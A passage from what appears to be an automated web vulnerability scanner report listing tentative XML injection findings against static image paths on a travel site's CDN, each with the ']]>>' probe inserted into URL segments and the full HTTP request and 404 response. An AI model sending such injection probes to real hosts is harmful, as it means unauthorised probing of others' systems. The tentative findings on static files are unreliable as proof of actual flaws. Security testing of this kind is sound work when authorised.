User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535950
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.85. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-right-side.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background]]>>/sidebar-module-right-side.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:09 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.86. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-right-side.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background/sidebar-module-right-side.gif]]>>?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:12 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.87. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-title-module-top-and-left-corner.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/global/background/sidebar-title-module-top-and-left-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:56 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.88. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-title-module-top-and-left-corner.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/global/background/sidebar-title-module-top-and-left-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535993
Date: Mon, 03 Oct 2011 01:02:00 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.89. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-title-module-top-and-left-corner.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global]]>>/background/sidebar-title-module-top-and-left-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.90. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-title-module-top-and-left-corner.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background]]>>/sidebar-title-module-top-and-left-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:09 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.91. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-title-module-top-and-left-corner.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background/sidebar-title-module-top-and-left-corner.gif]]>>?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:14 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.92. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-title-module-top-right-corner.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/global/background/sidebar-title-module-top-right-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:55 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.93. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-title-module-top-right-corner.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/global/background/sidebar-title-module-top-right-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.94. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-title-module-top-right-corner.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global]]>>/background/sidebar-title-module-top-right-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:59 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.95. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-title-module-top-right-corner.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background]]>>/sidebar-title-module-top-right-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.96. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-title-module-top-right-corner.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/background/sidebar-title-module-top-right-corner.gif]]>>?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:06 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.97. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/bullets/red-bullet-img.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/global/bullets/red-bullet-img.gif?ver=211768 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:55 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.98. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/bullets/red-bullet-img.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/global/bullets/red-bullet-img.gif?ver=211768 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:58 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.99. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/bullets/red-bullet-img.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global]]>>/bullets/red-bullet-img.gif?ver=211768 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.100. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/bullets/red-bullet-img.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/global/bullets]]>>/red-bullet-img.gif?ver=211768 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535954
Date: Mon, 03 Oct 2011 01:02:08 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.101. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/bullets/red-bullet-img.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

